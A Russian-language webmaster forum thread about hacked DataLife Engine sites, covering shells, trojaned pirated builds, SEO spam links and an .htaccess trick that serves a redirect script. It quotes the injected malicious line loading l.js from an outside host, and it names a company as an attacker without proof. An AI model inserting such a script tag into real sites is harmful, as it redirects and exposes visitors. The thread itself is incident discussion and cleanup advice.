Осторожно. Ломают DLE.

Модули, шмодули. Давно пора понять, что используя ДЛЕ вы рискуете. Этот зверь становится все популярней и соответсвенно к нему проявляется все более и более активное внимание со стороны дефейщиков.

Вы бы знали в каких масштабах ежечасно парсится гугл и яндекс на наличие новых сайтов на ДЛЕ.

Как только таковой находится на него толпами летит народ с шелами. За мою практику сайт появился в индексе гугла в 13 часов, в 14 с копейками 3(!) шела :) ну и все вытекающие - правленный .htaccess и файлы движка.

Но все это лирика! Все чаще и чаще в последнее время к взлому ДЛЕ начали прикладывать руку !сео компании!

В частности могу предоставить 3 бекапа ДЛЕшных баз, в которых В ТЕКСТЕ статьи тематично проставляются ссылки на саму студию (зачастую с наивысшим ПР) и на остальных страницах сайта, так же в ручном режиме проставляются ссылки на продвигаемые "конторой" сайты.

Имя этой говноконторы - aweb.com.ua.

Причем тексты дописываются к основным - и явно видна работа копирайтера. Нечто с родни заметки в GogetLinks.

Так что если редиректы и сливы траффика это результат работы одиночек, то в случае с "контекстными ломаными ссылками" - это работа группы людей, работа говноконторы aweb.com.ua.

И это я говорю только о ДЛЕ. А сколько еще дырявых двигов существует ?

Добавлю, что многие при этом ставят протрояненные NULL-версии DLE, которые после установки отстукиваются на сервер взломщикам и они преспокойно заливают там шелл через бекдор в NULL-движке. А дальше что душе угодно - хочешь дефейс, хочешь воруй траф, хочешь вешай сапу, вирус и т.д.

Подтверждаю, что есть этот взлом.

Причем http://jahpoker.ru/l.js - сам сайт тоже взломан.

Все сайты по цепочки работают. На моем сайте тоже был d.js - физически его не было на сайт.ру/d.js

но при переходе в браузере по ссылке сайт.ру/d.js открывалось содержание файла.

Они прописывают правило в .htaccess , что любое слово перед .js открывает файл /engine/editor/tiny.js

Тут http://jahpoker.ru/engine/editor/tiny.js как раз это и открывается.

Получается мой сайт физически имеет файл, который перенаправляет пользователей, если те пришли с поисковых систем на сайт парнерки. Возможны варианты только с мобильной версией сайта - если переход осуществляется с мобильника т.к. в .htaccess были прописаны какие-то правила и для мобильных клиентов. В index.php моего сайта встроен вызов <script src=http://jahpoker.ru/l.js></script>

В другие сайты встраивали <script src=http://название моего сайта.ru/d.js></script>.

Стоял модуль переходов без заплат. Снес его.

Переехал на другой хостинг. Поменял все пароли от почт. Пока полет нормальный - ничего лишнего не встраивается. Лишнего нет, но <script src=http://jahpoker.ru/l.js></script> так и остался.

Не могу найти где запрятался зверек, т.к. в index.php уже ничего лишнего не прописано.

Так же странно, что на площадке размещено около 15 сайтов и все DLE - различных версий от 8 до 9.3 - но взлому поддержан был только один. Самый посещаемый.

gruppastimul добавил 18.08.2011 в 13:02

В итоге гадость прописали уже банально в main.tpl (<script src=http://jahpoker.ru/l.js></script>)

а базу почистил от этого модуля?

да - все, что было в базе связано с модулем было снесено тоже

Ситуация похожа, изменение пароля фтп и прав на файл main.tpl не помогает. Код с ссылкой на js вставляется непосредственно движком. Хочу заметить, что из многих ДЛЕ сайтов на хостинге ломается только один, с наибольшими пузомерками в ПС. Периодически после стирания кода робот опять возвращается. В итоге Яндекс выкинул сайт полностью из индекса и забрал все тицы, Гугл выбросил из топов. И оказался сайт с нулями посетителей. Версия дле нуледовая, видимо здесь бока. Покупайте лицензию, типа.

Раньше стоял DLE NULL, был глуп, вешал всякие модули и тому подобное - переодически вешали скрипты сторонние....

Поборол просто - Поставил Лиц. DLE, перестал устанавливать кучу ненужного шлака в виде псевдо-офигенных модулей скачанных не известно откуда...

Какой фтп на дле? Там дыр больше, чем где бы то ни было, никакие пароли не нужны. Давно перестал работать с дле, перешел на другую бесплатную cms. И надежней, и удобней

Уважаемые! Если возникнут проблемы со взломом DLE, то можете обратиться ко мне в ЛС, имею огромный опыт работы с этой CMS. Помимо обнаружения и устранения вредоносного кода, могу помочь и с предотвращением взломов. Денег за помощь не беру.

joynkly добавил 30.08.2011 в 11:03

Нормальные, это какие? К примеру меня в DataLife Engine всё устраивает, но пришлось приложить некоторые усилия по настройке чистого движка, теперь свою собственную "сборку" использую на всех новых сайтах. Новичку можно обойтись и без этого, т.к. взломать DLE со всеми установленными официальными баг-фиксами не просто, но лично я параноик и не пренебрегаю дополнительными способами защиты.

фикс от всех болезней. ломают через ненадежные модули создаем во всех папках файл .htaccess и пописываем туда

<Files ~ "\.(php|phtml|php3|php4|php5|pl|asp|cgi|perl)$">

deny from all

allow from 127.0.0.1

</Files>

располагайте его смело везде кроме корня и бегайте смотрите ошибки. по ошибкам разрешаете доступ к некоторым файлам в папке engine, точно могу сказать дома свои htaccess, на работе доступа к фтп нет( по сути не так много файлов в dle нужно пользователю. добавление новостей, теги и т.п. только то что используется напрямую. все остальное инклюдится через index и пользователю это не нужно